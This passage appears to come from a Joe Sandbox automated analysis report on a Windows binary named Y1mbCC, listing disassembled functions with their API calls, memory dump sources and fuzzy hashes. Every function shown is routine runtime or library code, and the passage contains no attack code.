GetConsoleOutputCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDDC
WideCharToMultiByte.KERNEL32 ref: 000000014000FE0D
WriteConsoleA.KERNEL32 ref: 000000014000FE32

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
String ID:
API String ID: 1850339568-0
Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00

Function 00007FFE11ECFB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FFE11ECFB7C
_set_statfp.LIBCMT ref: 00007FFE11ECFB97
_set_statfp.LIBCMT ref: 00007FFE11ECFBB3
_set_statfp.LIBCMT ref: 00007FFE11ECFBEF

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction ID: cc1caaa9206e5328644c8171fe83e680ac27d335658b6fecbb160c5c74dc88d7
Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction Fuzzy Hash: 51112E72E18E1B01F75411AAED663BB15496F983B4FA846B4E5BF066FA8F3CBC414103

Function 00007FFE11EC9684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FFE11EC766F,?,?,00000000,00007FFE11EC790A,?,?,?,?,?,00007FFE11EC7896), ref: 00007FFE11EC96A3
FlsSetValue.KERNEL32(?,?,?,00007FFE11EC766F,?,?,00000000,00007FFE11EC790A,?,?,?,?,?,00007FFE11EC7896), ref: 00007FFE11EC96C2
FlsSetValue.KERNEL32(?,?,?,00007FFE11EC766F,?,?,00000000,00007FFE11EC790A,?,?,?,?,?,00007FFE11EC7896), ref: 00007FFE11EC96EA
FlsSetValue.KERNEL32(?,?,?,00007FFE11EC766F,?,?,00000000,00007FFE11EC790A,?,?,?,?,?,00007FFE11EC7896), ref: 00007FFE11EC96FB
FlsSetValue.KERNEL32(?,?,?,00007FFE11EC766F,?,?,00000000,00007FFE11EC790A,?,?,?,?,?,00007FFE11EC7896), ref: 00007FFE11EC970C

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction ID: 0cc338f8fff2f2dfdd167f264ccea376b06f423e9a1839cf907f63e35a8a7920
Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction Fuzzy Hash: ED113A20A1DE4245FB58A7B7AD513BB218A9F443F0FD453B4E86E066F6EE2CF4428200

Function 00007FFE11EC9518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FFE11EC9529
FlsSetValue.KERNEL32 ref: 00007FFE11EC9548
FlsSetValue.KERNEL32 ref: 00007FFE11EC9570
FlsSetValue.KERNEL32 ref: 00007FFE11EC9581
FlsSetValue.KERNEL32 ref: 00007FFE11EC9592

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction ID: a9ca42b0d653494e137236e36ea797bbcafaa943baa871b4499477a4aa5cfee8
Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction Fuzzy Hash: 77112A50E1DA034AFF68A6F75C523BB11899F543B0FD817B4D93E0A2F2EE2CB4429210

Function 00007FFE11EC5448 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFE11EC54B8
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE11EC5503

Strings

MOC, xrefs: 00007FFE11EC54CC
RCC, xrefs: 00007FFE11EC54D4

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction ID: 47f16dbf75775543bd84fc286692fb66d63308bd80f388ebc96c6af7b782b54d
Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction Fuzzy Hash: 5391B273A08B818AE710CBA6EC403AE7BA5FB44798F50417AEA4D57765DF3CE195CB00

Function 00007FFE11EC3A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE11EC3A63
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE11EC3AFA
RtlUnwindEx.KERNEL32 ref: 00007FFE11EC3B54

Strings

csm, xrefs: 00007FFE11EC3AE1

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction ID: dc1455c16c41e456d49a55d85cdac8b7725e37a32c86c65a82f3147b30351f03
Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction Fuzzy Hash: F651B031B0DA028ADB148B67DC44B7E7399EB40BA4F908171EA4E437A9DE7DF941C700

Function 00007FFE11EC51D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFE11EC5237
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE11EC5283

Strings

MOC, xrefs: 00007FFE11EC524B
RCC, xrefs: 00007FFE11EC5253

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction ID: e93fe7a5a5fc42469f1ee230f1ef46f56984f4beaa7139eed464f9802d1aec22
Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction Fuzzy Hash: 54619132A08BC585D7609B56EC403AEB7A4FB84BA4F444265EB9D07B69CF7CE190CB00

Function 00007FFE11EC59C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE11EC59F0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE11EC5AD8

Strings

csm, xrefs: 00007FFE11EC5B2A
csm, xrefs: 00007FFE11EC5A12

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction ID: 0764da7bc98978590f8938a17f41b14bf3fc2fbf359cf51fd3f90a2626622813
Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction Fuzzy Hash: 2751A132A08B828ADB648B97DC4436A7A98EF55BA4F944175DA4D437A5CF3CF450CB00

Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

GetModuleHandleA.KERNEL32 ref: 000000014000EE2D
GetProcAddress.KERNEL32 ref: 000000014000EE42

Strings

InitializeCriticalSectionAndSpinCount, xrefs: 000000014000EE38
kernel32.dll, xrefs: 000000014000EE26

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: AddressHandleLoadModuleProc
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 3055805555-3733552308
Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700

Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 000000014000271C
GetCurrentProcess.KERNEL32 ref: 0000000140002721
SetProcessWorkingSetSize.KERNEL32 ref: 0000000140002731

Strings

Shrinking process size, xrefs: 000000014000270E

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Process$CurrentSizeWorking
String ID: Shrinking process size
API String ID: 2122760700-652428428
Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310

Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400030E7
LeaveCriticalSection.KERNEL32 ref: 000000014000316B
EnterCriticalSection.KERNEL32 ref: 0000000140003195
EnterCriticalSection.KERNEL32 ref: 00000001400031C6
LeaveCriticalSection.KERNEL32 ref: 00000001400031DD

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744

Function 00007FFE11ECE3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FFE11ECE473
WriteFile.KERNEL32 ref: 00007FFE11ECE73B
WriteFile.KERNEL32 ref: 00007FFE11ECE781
GetLastError.KERNEL32 ref: 00007FFE11ECE837

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction ID: f33ce9108be948f7a24046f4d4511aaf5a320bab75aba0b8743de6beb48ae6d3
Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction Fuzzy Hash: 5AD1D432B18A9189E710CFA6DC402EE7BB9FB447A8B444276DE5D57BA5DE3CE406C340

Function 00007FFE11ECED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE11ECED07), ref: 00007FFE11ECEE38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE11ECED07), ref: 00007FFE11ECEEC3

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction ID: 3e86d5ba7712c78cd68ce6f08d5c70e212fe80dc12cadade809d70cb710504e2
Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction Fuzzy Hash: 1991B932A18E6289F7509FA69C4037E2FA9BB047A8F944175DE4E576A5DF3CF441C700

Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304

Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014000441F
ResetEvent.KERNEL32 ref: 00000001400044CB
SetEvent.KERNEL32 ref: 00000001400044D5
LeaveCriticalSection.KERNEL32 ref: 00000001400044DF

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344

Function 00007FFE11EC2218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFE11EC2244
GetCurrentThreadId.KERNEL32 ref: 00007FFE11EC2252
GetCurrentProcessId.KERNEL32 ref: 00007FFE11EC225E
QueryPerformanceCounter.KERNEL32 ref: 00007FFE11EC226E

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction ID: 4f94ad679d95b1c284504b9ea3cf470fc306ff6e2621f700fea15e01e6be516c
Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction Fuzzy Hash: 4B111C22B14F068AEF008BA1EC552B933A9F759768F441A31DA6D467A4DF7CD155C340

Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 000000014001367B
CreateEventW.KERNEL32 ref: 000000014001368D
CreateEventW.KERNEL32 ref: 00000001400136A7
CreateEventW.KERNEL32 ref: 00000001400136C0

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CreateEvent$CriticalInitializeSection
String ID:
API String ID: 926662266-0
Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700

Function 00007FFE11EC5C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE11EC5C2A

Strings

csm, xrefs: 00007FFE11EC5DBE
csm, xrefs: 00007FFE11EC5C4F

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction ID: 6c9466134537cfc573e6cfaa29c0228ef31b273019606e0cefba44cbc0e195ae
Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction Fuzzy Hash: 0C71A232608A818AD7648F569C4077E7BA4FB44BA4F448176EE8C47AA9CF3CF551CB40

Function 00007FFE11EC6298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE11EC6342
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FFE11EC636B

Strings

csm, xrefs: 00007FFE11EC646B

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

